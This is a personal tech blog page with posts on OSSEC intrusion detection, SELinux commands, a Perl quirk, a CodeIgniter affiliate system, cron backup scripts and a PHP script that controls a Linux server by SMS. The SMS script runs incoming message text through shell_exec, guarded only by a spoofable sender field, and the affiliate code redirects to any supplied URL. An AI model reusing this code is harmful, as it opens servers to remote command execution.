Welcome to tuukkamerilainen.com tech blog !

tux-36010_640This blog is dedicated to topics which are somehow related to Information and communications technology. Especially GNU/Linux, security, web development and other IT-related news and ideas are in spotlight. Above all I am going to publish things that gets my attention!

Me, myself and I

What is OSSEC, Host Based Intrusion Detection (HIDS) In Practice

December 21, 2022 What is OSSEC, Host Based Intrusion Detection (HIDS) In Practice

Introduction To OSSEC Host Based Intrusion Detection (HIDS)

Prevention of a security incident is ideal, but detection is a must. To detect a security incident is easier said than done. Host Based Intrusion Detection is a great concept to point out unusual activity and can help to concentrate on the most potential issues. To answer what is OSSEC Host Based Intrusion Detection in practice, you must understand the concept of Intrusion Detection.

Intrusion Detection in general aims to automatically recognise and alert about unusual or harmful activity or state of the system or network. With a host based intrusion detection system like OSSEC the intrusion detection system is installed in the certain host. Detection is in host not in the network (e.g. OSSEC is installed and runs on Linux server).

In practice this means that for example OSSEC is running on a Linux server. OSSEC will actively watch the activities in the file system, logs etc. and the goal is to be able to determine which activities are normal and relevant for the system and which are unusual or potentially harmful. If something unusual or harmful occurs, OSSEC will alert about an event with a criticality level from 1 to 10 (higher value means higher risk). OSSEC also contains features for active intrusion prevention. Meaning that the OSSEC is able to stop potentially harmful actions or attacks for example by automatically adding firewall rules to drop potentially malicious actor’s connection from a certain IP address.

First time I heard about “host based intrusion detection (HIDS)” I was quite confused. The HIDS didn’t ring any bells. From the name I couldn’t figure out what it is and what could be the benefits. Many years later the concept of HIDS feels like bread and butter in a successfully hardened system. In a nutshell, HIDS is a great system for securing the server and adding one important protective layer and moving towards defence in depth! In this post I will explain how HIDS works, how to use it and what are the benefits in my opinion.

Why HIDS And OSSEC Matters, The Defence In Depth Principle

Let’s say you have a valuable asset. For example Linux server which is used to deliver and store sensitive business critical information. The server is connected to the Internet because of high and flexible use-case related availability requirements. It is quite obvious that the server must be secure from an information security perspective (confidentiality, integrity and availability of data). There is no single magic trick or silver bullet that will make sure the server is protected. Instead multiple threat aspects must be noted and many different security controls must be in place. At this point, the principle of defence in depth appears in the spotlight.  Defence in depth in practice means adding multiple protective layers and measures to secure valuable assets.

To ensure defence in depth in the Linux server, effective prevention methods of external attacks are ideal. Detection of the attack on the other hand is a must and lets not forget capabilities to response to the incident. In Linux server context, when we think about prevention techniques, following are quite basics to start from:

  • Security updates (always, not just today)
  • Limited user accounts and privileges in general (least privilege with the system’s own capabilities)
  • Mandatory Access Control (SELinux, AppArmor, etc. to enhance access control after previous)
  • Just necessary mandatory software installed/running (remove or deactivate everything that you don’t need)
  • Hardened administration channels (ssh hardening etc.)
  • Strict firewall rules
  • Web application firewall (in case of web server)

In my opinion, the previous are mandatory to any system that is connected to the Internet. But what happens when the attacker is able to break through one of the previous protection layers or even all of these? And it really is about when it happens, not if it happens. In that case we need detection capabilities and active reaction. This is the stage for host based intrusion detection like OSSEC. Detection and alerting includes following aspects:

  • Active monitoring of different logs and matching to known attack patterns or risky actions (syslog, apache logs, auth log, etc.)
  • File system monitoring based on file integrity (did some files suddenly changed under /etc or /var/www)
  • Is there a malware or rootkit somewhere in the system

What Is OSSEC Host Based Intrusion Detection

The idea is to monitor certain hosts and actively alert in real-time of unusual or harmful security related events. The monitoring with OSSEC can be performed locally or with server/agent combination.

Lets say you have a Linux based production web-server called “main web”. The main web server can work as an OSSEC agent and another separate server can work as an OSSEC server. In this case the “main web” will send all the alerts to the OSSEC server and perform monitoring based on the rules configured in the server.

On the high level OSSEC contains following features

  • Log based Intrusion Detection (LIDs)
  • Rootkit and Malware Detection
  • Active Response
  • Compliance Auditing
  • File Integrity Monitoring (FIM)
  • System Inventory

For What OSSEC Is Used For

OSSEC has many use cases, it can be used to monitor multiple different servers with different operating systems (Linux, Windows, FreeBSD, etc.) in realtime from another monitoring server. In a minimalistic approach, OSSEC simply runs locally and monitors the system and alerts can be seen locally or received via email (there is actually even a Slack integration).

How I Use OSSEC

In my case I have typically monitored critical Internet facing assets (mostly Linux servers). OSSEC is running on critical assets in agent mode. I monitor that critical asset with OSSEC running in server mode on another host. Between these two servers I have established a UDP connection that is encrypted by OSSEC. At the end I use Splunk to visualise all the data and I can monitor the critical Internet facing asset easily with a browser.

ossec kids with Splunk setup

How to Install And Configure OSSEC

To install OSSEC on Ubuntu 20.04 I followed this guide on Digital Ocean the guide contains a few basic configuration examples as well. During the installation in my case everything worked smoothly even the guide is made for Ubuntu 14.04. The OSSEC comes with a handy installation script which guides you. OSSEC documentation is also quite handy.

There are multiple deployment/installation possibilities. As said I chosed agent & server method in which agent I am running in a critical asset and all the OSSEC alerts will be sent to the OSSEC server running on another environment.

My pro tips for installing:

How To Configure Splunk to Visualize The OSSEC Alerts

Once you have an OSSEC agent and server running on Linux and communication is working. Well on that point you can access OSSEC alerts at /var/ossec/alerts, or configure the OSSEC to send alerts via email. I like the possibility of accessing the data with a browser and I think Splunk works quite smoothly.

One thing to notice is that as far as I know, OSSEC doesn’t support rsyslog or any other methods to smoothly send alert data to remote hosts that are not running OSSEC server. For that reason I have decided to run Splunk and OSSEC server on the same host.

If you don’t know how to install Splunk, you will have to read the documentation and do some googling. Or you can choose the lazy way like I did. I am a big fan of the Linode hosting environment. In the management console they offer a marketplace which contains a few click installation GUI which actually deploys Splunk that is ready to use.

When you have Splunk running you can just install OSSEC server on the same host. After that there is quite easy to follow guide on how to configure OSSEC to send alerts to Splunk and Splunk to show the data. Unfortunately the guide doesn’t contain all the details and there is actually reference to OSSEC documentation. If you have problems seeing the data in Splunk check this section of OSSEC documentation carefully (you need to enable client-syslog etc.).

Conclusion of OSSEC Host Based Intrusion Detection

  • Prevention of a security incident is ideal, but detection is a must OSSEC will help with that
  • Host Based Intrusion Detection is one of the key elements when aiming for “defence in depth” of Internet facing critical server
  • OSSEC is a handy and feature rich Host Based Intrusion Detection system with active response capabilities
  • Alerts from OSSEC can be sent to you via email, Slack or you can visualise them for example with Splunk
  • I am sure you will have serious fun with OSSEC and it’s configuration capabilities if you haven’t tried it before and you like to explore Linux server related stuff

Mighty SELinux cheat sheet

October 14, 2016 selinux-penguin-new_medium

Cheat sheet for SELinux( Security-Enhanced Linux ) . More information about the project at https://selinuxproject.org/. All commands tested on CentOS release 6.8 (Final).

Logs

Everything:

$ less /var/log/audit/audit.log

Human readable:

$ less /var/log/messages

Commands:

Status

$ sestatus

Permissive/Enforcing

$ setenforce 0/1

More information about sealert (these are in /var/log/messages)

$ sealert -l IDHERE

Show all booleans

$ getsebool -a

List all stuffs which are in permissive

$ semodule -l|grep "permissive"

Check file/directory context

$ ls -Z

Check process context

$ ps aux -Z

Check network related information

$ netstat -Z
$ netstat -atZ

List audits to allow(based on selinux alerts)

$ audit2allow -a

Create policy based on audits to allow list

$ audit2allow -a -M fancypolicynameofyourchoice

Activate the policy

$ semodule -i fancypolicynameofyourchoice.pp

Set something to Permissive/Enforcing(httpd in this example)

$ semanage permissive -a httpd_t
$ semanage permissive -d httpd_t

Copy context to file/directory from existing file/directory

$ chcon -R --reference /source /destination

Creating your own policy (te -> pp)

$ checkmodule -M -m -o fancypolicynameofyourchoice.mod fancypolicynameofyourchoice.te
$ semodule_package -o fancypolicynameofyourchoice.pp -m fancypolicynameofyourchoice.mod

Activate your own policy

$ semodule -i fancypolicynameofyourchoice.pp

Example of a basic custom module

This module will allow httpd to open files in tmp context(/tmp)

module fancy_example_policy 1.0;

require {
type httpd_t;
type tmp_t;
class file { open };
}

allow httpd_t tmp_t:file open;

Remove activated policy

$ semodule -r fancy_example_policy

Learn

http://www.linuxtopia.org/online_books/getting_started_with_SELinux/SELinux_overview.html
http://danwalsh.livejournal.com/

Crazy things can happend in dynamically typed languages (such as in Perl)

October 13, 2016 dynamic typed vs static typed languages

Alright, some people really love programming languages which are dynamically typed. Some say that statically typed is the only way. I do not know which camp I belong to. Or do I even want to belong any. How ever I found crazy thing which happened with dynamically typed language.

What it actually means when language is dynamic typed or static typed. I am not the top expert to answer to this question but in the nutshell it is something like…

In dynamically typed language you can declare variable like this:

$number = 1;
$word = "something";

In statically typed language you have to declare variable like this:

int $number = 1;
String $word = "something";

Here comes the crazy thing I promised

If you have ever developed with Perl you know that in Perl you can do many things like you want. Perl is dynamically typed language. I was adding some functionality into a already existing piece of code. There was already many checks and if something failed – error message was appended to $errors variable.

I added this block to that existing code:

if ( $errors->{what_ever} ){
    # Do something
}

That block broke everything. And it did it the way I could never expect. Plus there was absolutely no errors(even that strict and warnings exists). Here are two proof of concepts:

1. This is similar to my situation where everything failed.

 #!/usr/bin/perl
use strict;
use warnings;
use Data::Dumper;

my $errors;

print Dumper($errors); # $VAR1 = undef;

if( $errors ){
    # This is not true
    print "This is not true\n";
}

if ( $errors->{what_ever} ){
    # Do something
}

print Dumper($errors); # $VAR1 = {};

if( $errors ){
    # This is true
    print "This is true\n";
}

2. This is the valid version which works.

 #!/usr/bin/perl
use strict;
use warnings;
use Data::Dumper;

my $errors = {};

print Dumper($errors); # $VAR1 = {};

if( $errors ){
    # This is true
    print "This is true\n";
}

if ( $errors->{what_ever} ){
    # Do something
}

print Dumper($errors); # $VAR1 = {};

if( keys %{$errors} ){
    # This is not true
    print "This is not true\n";
}

So what really happened in that first piece of code?

First I declared variable

my $errors;

It tells to Perl that “hey I want to use scalar called errors, please let me”.

Then little bit later comes the block:

if ( $errors->{what_ever} ){
    # Do something
}

There I asked “dear Perl do you remember that scalar called errors, please test if that scalar hash key called what_ever”. Then Perl thinks “Sure I remember it and sure I can test it. Oh wait, scalars do not have keys. Only hashes have keys. Well I make this errors variable hash”Here is the big deal. Perl defines $errors to be hash. I could never expect it will do it in if statement.

Then code runs forward and comes

if( $errors ){
    # This is true
    print "This is true\n";
}

Here I am asking: “Please Perl one more question: Can you tell if $errors is true”. Perl answers: “Of course it is true, it is the hash”. What I expected here is that perl says “It is false because there is nothing in there”.

So what do you think, is this crazy or not?

Affiliate system on Codeigniter

June 10, 2015

Introduction

I have a friend (yes, you read it right) who is using codeigniter on his e-commerce. He has been looking for a solution to pay comissions to advertisers. I recommended affiliate system for him and came out that he has never even heard about it before. I introduced the concept for him and we started research how it actually works behind the scenes. For me it meant googling and how to actually code it. It felt like a chaos and I did not get any further for a long time. This all affiliate world in google is flooding those afiiliate sites which are advertising everything else except how to design affiliate system.

Finally I found this Stackoverflows thread: http://stackoverflow.com/questions/16231995/how-to-design-an-affiliate-system-on-codeigniter-to-use-on-every-page-on-the-si . That was exact answer to all my questions and after all that mess it was very easy to actually build the very basics of the system. I am going to show how I did it based on that Stackoverflows thread.

How does it work

When advertiser recommends something. He/she will use URL which contains referer id.  If basic URL of the site is something like: http://example.com/products/23423 . With this affiliate system the advertiser would use something like this instead: http://example.com/ref?id=tuukkamerilainen&url=products/23423 . Now the customer who clicks the link will redirect to site and first of all requesting class Ref (ref.php). In ref.php we will make a new cookie which contains information about the advertiser. If the customers will make an order after when “make an order” button is clicked we will check if customer has the cookie containing information about advertiser. If yes then we will save information about order and advertiser to database in same row.

Required changes for the system

  • ref.php to controllers
  • Cookie check and database insert to orders.php or whatever it is in your system(controller which will handle the request when customer makes orders)
  • Table in database for affiliate information

ref.php

[php]

<?php

class Ref extends CI_Controller {

/**
* Index Page for this controller.
* @author      Tuukka Merilainen
* @copyright   10.6.2015
* @see http://codeigniter.com/user_guide/general/urls.html
*/
public function index()
{
$url = $this->input->get(‘url’);
$ref = $this->input->get(‘id’);
$cookie = array(
‘name’   => ‘refcookie’,
‘value’  => $ref,
‘expire’ => ‘86500’,
);

$this->input->set_cookie($cookie);
$this->load->helper(‘url’);
redirect($url);
}
}

[/php]

orders.php

[php]

$this->load->helper(‘cookie’);
if (get_cookie(‘refcookie’)) {
$refCookie = $this->input->cookie(‘refcookie’, TRUE);
$order_id = $d[‘order_id’];
$affidata = array(
‘OrderId’ => $order_id,
‘RefId’ => $refCookie
);
$this->db->insert(‘affiliate’, $affidata);
}

[/php]

Database

In this example there is orders table already which has atribute OrderId. We will use it as Foreign Key.

[sql]

CREATE TABLE IF NOT EXISTS `affiliate` (
`afid` int(11) NOT NULL,
`OrderId` smallint(5) unsigned NOT NULL,
`RefId` varchar(255) NOT NULL
) ENGINE=InnoDB  DEFAULT CHARSET=latin1 AUTO_INCREMENT=5 ;

ALTER TABLE `affiliate`
ADD PRIMARY KEY (`afid`), ADD KEY `OrderId` (`OrderId`);

ALTER TABLE `affiliate`
MODIFY `afid` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=1;

ALTER TABLE `affiliate`
ADD CONSTRAINT `afiliate_ord` FOREIGN KEY (`OrderId`) REFERENCES `orders` (`OrderId`) ON UPDATE CASCADE;

[/sql]

How to use it

Now when customer comes from advertiser site and makes an order in your site affiliate table will be updated. From that table it is possible to count commissions to advertiser or do what ever you like. It might be good idea to make another view which contains some more information (maybe total amount of the order, etc.).

Conclusion

As you might already noticed this is just the basic template for the affiliate system. It may work in small e-commerce just like this. On long term use and with lots of traffic there is lot to do and happy moments on developing. I hope this guide will give you some ideas where to start and how it would be done.

 

Simple backup system for Linux with Bash, Tar, Rsync and Crontab pt.1/2

June 9, 2015

Introduction

I have spent many hours for backingup my servers files. I used to have one text file which contained predefined tar and rsync commands and I was copy-pasting them. Sometimes I did this once in a week and sometimes once in a month. This wishy washy thing was totally ok but it was waste of a time. After all this mess I realised I have to do something for this. I decided to automize it with simple bash-scripts and crontab.

Tested on Ubuntu 14.04 LTS.

This first part contains information how to make backups. Second part will show how to recover the backups.

This is how it works in a nutshell

First of all I have two Linux servers. Production node and node for storing my backups. I also have setuped public key authentication between them(nice guide for public key authentication). For example if I am logged in my production node I am able to login to backup-node like this(without asking for a password):

[raw]$ ssh backup-node[/raw]

The backup process is handled by these two files:

[raw]backup-tar.sh backup-rsync.sh[/raw]

backup-tar.sh is the script which will make mysql dump(backup of a database) and compress my full-system(/) in single tar.gz file. This script is executed by root user crontab.

backup-rsync.sh is executed by normal user crontab. It contains credentials for sending backup-files to backup node via rsync.

PLEASE NOTICE! There are two separate files for a reason. Tar process has to be done with root privilleges(sudo) since it will compress files owned by root aswell. But if we want to rsync without password authentication it is not possible with sudo. If you try to do: $sudo rsync … it will always ask for password.

backup-tar.sh

[raw]#!/bin/bash
#Purpose = Backup of Important Data
#Created on 05-05-2015
#Author = Tuukka Merilainen
#Version 1.0

#START
# Tar credentials
DATE=`date +%d-%b-%Y`                  # This Command will add date in Backup File Name.
FILENAME=fullbackup-$DATE.tar.gz       # Here I define Backup file name format.
SRCDIR=/                               # Location of Important Data Directory (Source of backup).
DESDIR=/example/please/change        # Destination of backup file.

# Database credentials
user=”root”                             # username for database eg. root
password=”example-password”   # password for database
db_name=”fulldbbackup”                  # name for db backupfile
backup_path=”/example/please/change” # path where backup is stored

# Dump database into SQL file
mysqldump –user=$user –events –ignore-table=mysql.event –password=$password –all-databases > $backup_path/$db_name-$DATE.sql

# Make tarball of /
tar -cpzf $DESDIR/$FILENAME –directory=/ –exclude=proc –exclude=sys –exclude=dev/pts –exclude=$DESDIR $SRCDIR
#END[/raw]

backup-rsync.sh

[raw]#!/bin/bash
#Purpose = Sync backup files to an another server
#Created on 05-05-2015
#Author = Tuukka Merilainen
#Version 1.0
#START

rsync -a –bwlimit=5000 -e ssh –hard-links –inplace sourcefolder destinationuser@example.com:/full-backup

#END[/raw]

How to make it work

Download and extract the scripts

[raw]$ wget http://tuukkamerilainen.com/files/backup.tar.gz[/raw]
[raw]$ tar -xf backup.tar.gz[/raw]

Edit the scripts to match your environment

Take care of filepaths and address for a backup server. Atleast modify everything marked with something like “example”.

Make two different crontabs

Firsr for backup-tar.sh
[raw]$ sudo crontab -e[/raw]

Add line:
[raw]00 08 * * 7 /bin/bash /path/to/backup-tar.sh[/raw]
This will run the backup-tar.sh script every sunday at 08:00.

Then for backup-rsync.sh
[raw]$ crontab -e[/raw]

Add line:
[raw]00 23 * * 7 /bin/bash /home/tuukka/backup-rsync.sh[/raw]
This will run the backup-rsync.sh script every sunday at 23:00.

Sources

http://www.broexperts.com/2012/06/how-to-backup-files-and-directories-in-linux-using-tar-cron-jobs/

https://ukk.kapsi.fi/questions/164/synologyn-rsyncilla-siiloon

 

 

Control Linux server via sms (reboot, get uptime, send mail, etc.) Part 1

May 17, 2015

Introduction

As I mentioned in previous post. I enrolled to Linux as server course immediatly when I started in Haaga-Helia. It was a excellent choice and now I am continuing my Linux studies with Linux project course. In this course everybody is free to choose own project. It has to be something which solves some kind of problem but basicly you can do what ever kind of project you like. This is my project on Tero Tuoriniemi`s Linux project course.

What would you do if something bad happens to your server when you are in the middle of nowhere without connection to Internet? How cool it would be if you could manage that situation just by sending sms to your server and reboot or get some information and try to solve the problem othervise? I would say it would be atleast pretty cool!

I am going to show how to actually do it with these tools:

  • Debian
  • Apache + php
  • Twilio.com account + number
  • iPhone
  • Mail server for sending email
  • API-key from ilmatieteenlaitos for wheather data

Table of contents:

Introduction

Starting pointExamplesPhp script for controlling Linux via sms (this goes to your server)How the script worksScript done, then what?Setting up the twilio.com for sms-controlWhat next?Conclusion

Control linux via SMS wit Twilio.com diagram

Starting point

I have Debian running on Linodes virtual private server. Apache and php are configured and tested (I like to use this Digital Oceans tutorial for it).

You will also need to have account in Twilio.com. It is service which provides “sms-tools”. Basicly you can buy a number and send the sms-messages to it. Then the Twilio passes the message sent to the number to somewhere. In this case “somewhere” is our Debian-server.

Examples

Using my service is super easy. For security reasons I made it to work only from messages sent from my personal number. So it is not available for public use. If you like you can build it for yourself with this guide.

When I like to reboot my system I do following:

SMS-message:

boot

Send to number:

+12345678 (this is not the real number, but similar)

After message is sent, server reboot process starts in less than 2 seconds and I got this sms-message as respond:

The system is going down for reboot NOW! :)

How to boot linux via sms and Twilio view from iPhone
How to boot linux via sms and Twilio view from linux console

Sometimes I like to get uptime of my server and I do this:

SMS-message:

exec uptime

Send to number:

+12345678 (this is not the real number, but similar)

In few seconds I get something like this as response:

19:30:44 up 1 day, 6:08, 0 users, load average: 0.01, 0.02, 0.05

Few days ago I was so lazy that I did not want to get off from bed just to watch temperature from thermal meter so I asked it from my server:

SMS-message:

ilma helsinki

Send to number:

+12345678 (this is not the real number, but similar)

In few seconds I get something like this as response:

Bunny friendly temperature: 1.46 helsinki

Next I will show you how to make this all happen! 🙂

Php script for controlling Linux via sms (this goes to your server)

When you send sms-message to the Twilios number, Twilio receives it as plain a text and then redirects it to an URL specified in your Twilios account settings. In my case I have this URL in the settings: http://myserverip/control-sms.php. This script is the thing which actually makes the magic happen e.g. reboot. It checks the message redirected from Twilio and makes things depended on the content of the message. Finally it will combile xml-data and Twilio will read that and send the content back to the original message sender. For example if your message is requesting reboot, server will response:  “The system is going down for reboot NOW! :)” and you get that kind of message via sms.

Full script:

[php]<?php

//first 5 characters of the message are dedicated to declare the purpose (mail, ilma or exec)
$action = substr($_REQUEST[‘Body’],0,4);
//rest of the message is an actual content
$message = substr($_REQUEST[‘Body’],5,150);
//get senders number
$number = $_REQUEST[‘From’];
$allowedNumber = +358400630148;

//Check the senders number
if($number != $allowedNumber){
exit();
}

if(strpos($message, “@”) !== false && $action == “mail”){
//To reach this point message have to be like: mail someone@example.com message-you-would-like-to-send
$spacePos = strpos($message, ” “);
$mailTo = substr($message,0,$spacePos);
$message = substr($message,$spacePos,100);
shell_exec(‘echo ‘.$message.’ | mail -s SMS-mail -a “From: put.your-own-email-here@example.com” ‘.$mailTo.”);
$result = “mail sent”;
}else if($action == “ilma”){
//To reach this point message have to be like: ilma helsinki (only works with Finnish cities/places)
date_default_timezone_set(‘Europe/Helsinki’);
$pvm = date(‘Y-m-d’);
$time = date(‘H:00:00’);
$location = substr($_REQUEST[‘Body’],5,40);
$dom = new DomDocument();
//Takes data from ilmatieteenlaitos open-data
//For this to work please add your api-key. You can get it for free from https://ilmatieteenlaitos.fi/rekisteroityminen-avoimen-datan-kayttajaksi
$dom->loadXML(file_get_contents(“http://data.fmi.fi/fmi-apikey/set-yout-own-api-key-here/wfs?request=getFeature&storedquery_id=fmi::forecast::hirlam::surface::point::timevaluepair&place=”.$location.”&parameters=temperature&starttime=”.$pvm.”T”.$time.”Z&endtime=”.$pvm.”T”.$time.”Z”));
$tempSource = $dom->getElementsByTagNameNS(“http://www.opengis.net/wfs/2.0”, “member”);
foreach ($tempSource as $m) {
$point = $m->getElementsByTagNameNS(“http://www.opengis.net/waterml/2.0”, “point”);
foreach ($point as $p) {
$tempTime =  $p->getElementsByTagName(“time”)->item(0)->nodeValue;
$temperature = $p->getElementsByTagName(“value”)->item(0)->nodeValue;
}
$result = “Bunny friendly temperature: “.$temperature.” “.$location;
}
}else if($action == “exec”){
//To reach this point message have to be like: exec ls
$result = shell_exec($message);
}else if($action == “boot”){
//To reach this point message have to be like: exec ls
shell_exec(‘sudo /home/tuukka/reboot.sh’);
$result = “The system is going down for reboot NOW! :)”;
}else{
$result = “command not found”;
}

//Compiles xml data for Twilio. This is actually what clickatel is looking for.
header(“content-type: text/xml”);
echo “<?xml version=\”1.0\” encoding=\”UTF-8\”?>\n”;
?>
<Response>
<Message><?php echo $result ?></Message>
</Response>
[/php]

How the script works

(If you do not care about how it works or you are just too curious to test it immediately you can skip this part, but please note that to use wheather you need an api-key from ilmatieteenlaitos.)

In this script there are four different types of tasks which can be done: send mail, get weather temperature of specific location, execute command on shell or reboot system. If none of these happend script will return string: “Command not found”. I am going to explain how these different tasks work. But…

First of all the script gathers basic information:

[php]//first 5 characters of the message are dedicated to declare the purpose (mail, ilma or exec)
$action = substr($_REQUEST[‘Body’],0,4);
//rest of the message is an actual content
$message = substr($_REQUEST[‘Body’],5,150);
//get senders number
$number = $_REQUEST[‘From’];
$allowedNumber = +358400630148;
//Check the senders number
if($number != $allowedNumber){
exit();
}[/php]

It takes four first letters from message and sets them to $action variable which will be used to route actions(which task to do). Then it puts rest of the message to $message variable. This is the actual “command” which will be executed. After that it takes the number where message was sent and sets it to $number variable. Finally it will check that $allowedNumber and $number are the same. If not, script will be terminated and nothing happens. This last step is there to make sure that no one else can not for example reboot your system. So the only way to control the server is send message from number which is specified as $allowedNumber.

At this point we have two important variables: $action and $message.

§action defines what user wants to be done (which one of those four tasks)
$message defines what kind of information user gave (content of the email, location info for weather or command to be executed)

1. Task: sending mail

[php] if(strpos($message, “@”) !== false && $action == “mail”){
//To reach this point message have to be like: mail someone@example.com message-you-would-like-to-send
$spacePos = strpos($message, ” “);
$mailTo = substr($message,0,$spacePos);
$message = substr($message,$spacePos,100);
shell_exec(‘echo ‘.$message.’ | mail -s SMS-mail -a “From: put-your-own-email-here@example.com” ‘.$mailTo.”);
$result = “mail sent”;
}[/php]
If $message contains @-character and $action = ilma script this task will be executed.

Then the script looks for first space and sets string before it to $mailTo variable and uses it as email address where to send the mail. Rest of the $message is the actual content of the mail. Finally the script will set “mail sent” string to $result variable. This is the string which is goig to be response for original sms-message.

2. Task: check weather

[php]else if($action == “ilma”){
//To reach this point message have to be like: ilma helsinki (only works with Finnish cities/places)
date_default_timezone_set(‘Europe/Helsinki’);
$pvm = date(‘Y-m-d’);
$time = date(‘H:00:00’);
$location = substr($_REQUEST[‘Body’],5,40);
$dom = new DomDocument();
//Takes data from ilmatieteenlaitos open-data
//For this to work please add your api-key. You can get it for free from https://ilmatieteenlaitos.fi/rekisteroityminen-avoimen-datan-kayttajaksi
$dom->loadXML(file_get_contents(“http://data.fmi.fi/fmi-apikey/set-your-own-api-key-here/wfs?request=getFeature&storedquery_id=fmi::forecast::hirlam::surface::point::timevaluepair&place=”.$location.”&parameters=temperature&starttime=”.$pvm.”T”.$time.”Z&endtime=”.$pvm.”T”.$time.”Z”));
$tempSource = $dom->getElementsByTagNameNS(“http://www.opengis.net/wfs/2.0”, “member”);
foreach ($tempSource as $m) {
$point = $m->getElementsByTagNameNS(“http://www.opengis.net/waterml/2.0”, “point”);
foreach ($point as $p) {
$tempTime =  $p->getElementsByTagName(“time”)->item(0)->nodeValue;
$temperature = $p->getElementsByTagName(“value”)->item(0)->nodeValue;
}
$result = “Bunny friendly temperature: “.$temperature.” “.$location;
}
}[/php]
If $action is string ilma this task will be executed. First it sets timezone, gets current date and time and gets $location from the sms-message. Then it loads XML data from ilmatieteenlaitos which provides all findings as open data. For getting the temperature it uses current date and time stored in $pvm and $time variables. Finally it sets temperature and location to $result variable which will be sent back to sms-sender.

3. Task: execute command in shell

[php]else if($action == “exec”){
//To reach this point message have to be like: exec ls
$result = shell_exec($message);
}[/php]
If $action is a string exec this task will be executed. As you can see this is very simple. $message will be executed in shell and response (response for ls command for example is list of files in directory) will be set to $result variable and sent to original sms-sender.

4. Task: reboot system

[php]else if($action == “boot”){
shell_exec(‘sudo /home/tuukka/reboot.sh’);
$result = “The system is going down for reboot NOW! :)”;
}[/php]
If $action is a string boot this task will be executed. This task is little bit tricky. In Debian and Ubuntu system is easy to reboot with command: reboot but it requires sudo. Php:s built in shell_exec method does not have sudo privilleges by default. I have solved the problem by making bash script reboot.sh and in sudoers file I have specified that www-data has privilleges to sudo that file.

reboot.sh (in my system it is in path /home/tuukka/reboot.sh):
[raw]#!/bin/sh
reboot[/raw]
In /etc/sudoers I have added this line:
[ini]www-data ALL=NOPASSWD: /home/tuukka/reboot.sh[/ini]

 

Script done, then what?

Simply, put this script under your public_html or whatever folder which is accesible via Internet. In my case script is in /var/www/sms-control.php .

Now I make a promise. The following step will be the last!

Setting up the twilio.com for sms-control

Head to twilio.com and create a new account. After that you will need to enter your credit card details and load some money to your account. After that click Numbers link and Buy a number

Twilio.com buying number part1

Next set search method to sms and click search

Twilio.com buying number part2

Then choose any number from the list and click Buy

Twilio.com buying number part3

Then you have to confirm your purchase

Twilio.com buying number part4

After that head back to Numbers and click on the number you just purchased

Twilio.com buying number part5

Then scroll down and set url which goes to your sms-control.php script

Twilio.com buying number part6

Good news: all done and everything should work! Try to send sms to your number which you just purchased.

What next?

Well I have actually did something already. Would it be super cool to get information about your home via sms. I think it would and I have started by measuring temperature. I made my Raspberry Pi to measure the temperature, store it to a database and upgraded the sms-control.php to check current temperature from the database. I am going to explain this task in part 2.

Next thing what I would like to do is build surveillance camera from Raspberry Pi and get photos via sms (hopefully this means there will be part 3:).

Conclusion

To get this to work you will need to have:

  • Linux server with apache and php
  • Account in the Twilio.com
  • Number purchased from the Twilio.com
  • Php-script in your linux server (and URL to it)
  • URL set in the Twilio.com numbers settings

More information: https://www.twilio.com/docs
sms-control.php on GitHub: https://github.com/RakField/control-linux-sms

If you like to get some more information please head to: http://www.haaga-helia.fi/fi/hakijalle

This post is made in cooperation with Haaga-Helia University of Applied Sciences.

What kind of University is Haaga-Helia

March 17, 2015

Introduction

I am going to slightly open different University options in Helsinki and especially write about Haaga-Helia, which is my weapon of choice.

In 2013 in a middle summer I started exploring different options where to go and what to do in the future. I was 24-years old and I realized I would like to study ICT. Journey to that part were long and bumpy but very instructive. Soon I noticed that there is going to be one more hard decision to make. In which University I would like to study?

Universities in Helsinki

First of all there is University of Helsinki. It is the University where Linus Torvalds studied. Then there are Universities of applied sciences: Haaga-Helia, Laurea and Metropolia.  In all those four schools have ICT courses.

When I went through the options I found that Haaga-Helia is the only University which main focus is to serve companies demand. It is not just nice promise it really appears in course selection. For me the most interesting courses are the ones relating to programming, software development, Linux and business. There are lot of them. Has been a year since I started my studies and it still feels like Haaga-Helia is what I was looking for.

Haaga Helia`s entrance exam

The exam day was full of electric. There is massive lobby at Pasila`s campus which was flooding curious IT minded people. I was really impressed about the fancy building and the people. At the very first moment when I felt the atmosphere in Haaga-Helia I noticed that this is the place where I would rather be.

There was no advance material for the exam. First part was mostly basic reasoning and pseudo style programming. Second part was related to bitcoins. We had to read an article written by Petteri Järvinen and had about 30 minutes time for reading it. I was very excited about what I was reading. After that we had to bring back the article and got paper with questions related to it.

View of Haaga-Helia`s lobby

Orientation

The good news arrived and I got in. ICT studies starts twice in a year. I started in January. First week was dedicated to get to gether things. First day was just basic lessons in auditorium.  Something very positive was that tutors acted in big role in those days. It seems natural to get tips from other students who had been there for a while and already completed some studies.

Student union Helga

In those first days it came very clear that Haaga-Helia has very lively student union called Helga. They organize lots of events and it feels like there is something going on every week. In the campus they have nice lounge in the basement. It is comfortable place to socialize, eat snack, hang out or just take a nap between courses.

Helga point at Haaga-Helia Pasila

Course selection

I am studying Business Information Technology. I think it is very practical programme. Courses are chosen in the name of what every ICT guys should know plus courses which support that knowledge. For example in first period we had these two courses Workstations and Networks and Business Operations and Environment. First course were pure ICT and our teacher Juhani Merilinna turned out to be true professional when it comes to Linux and Windows. We learnt basics about how to configure workstations and how to build a network. The second course Business Operations and Environment was more like an introduction to the business world. Purpose was to show frames in which we are going to work in. To be honest so far there has not been any courses where I have not been able to find its purpose.

Before every period students has to enroll to courses. It is totally up to you what would you like to study and when. Of course there is some limits but not so much. There is planned schedule, which shows optimal order. Some courses have dependencies, which courses have to be completed before enroll. But basically enrolling to courses is very flexible. I have already completed many courses, which are scheduled to complete in sixth or seventh period, and I am currently on third period. For example I did Linux as server course in first period and it had Workstations and Networks course as dependency. I asked from the teacher if I can try to complete it even I had not complete dependencies yet and it was all right. When the course ended I got excellent grades.

Studying

After enrolling to the courses starts the hard part. Well actually it is not that hard. Studying in Haaga-Helia is quite fun I think. A short list of things that I like:

  • Timetables are flexible
  • Cafeteria and canteen are serving delicious and cheap refreshments
  • Other students are nice and polite
  • Library is nice place to work
  • Pasila`s building is awesome

Here is my timetable at the moment. It is quite nice. Not so long days and only one early wake up. Of course this is just one of timetables(changes 4 times a year) but they have all been very similar.

my-timetable

Of course we have tasks to complete outside the classes. But still it is not too much what we have to do.

Conclusion

